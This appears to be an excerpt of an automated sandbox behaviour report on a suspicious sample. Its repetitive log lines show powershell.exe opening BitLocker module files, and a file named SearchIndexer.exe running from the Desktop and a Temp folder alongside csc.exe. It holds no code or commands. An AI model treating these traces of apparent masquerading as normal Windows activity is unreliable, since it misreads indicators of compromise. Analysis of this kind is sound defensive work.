Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
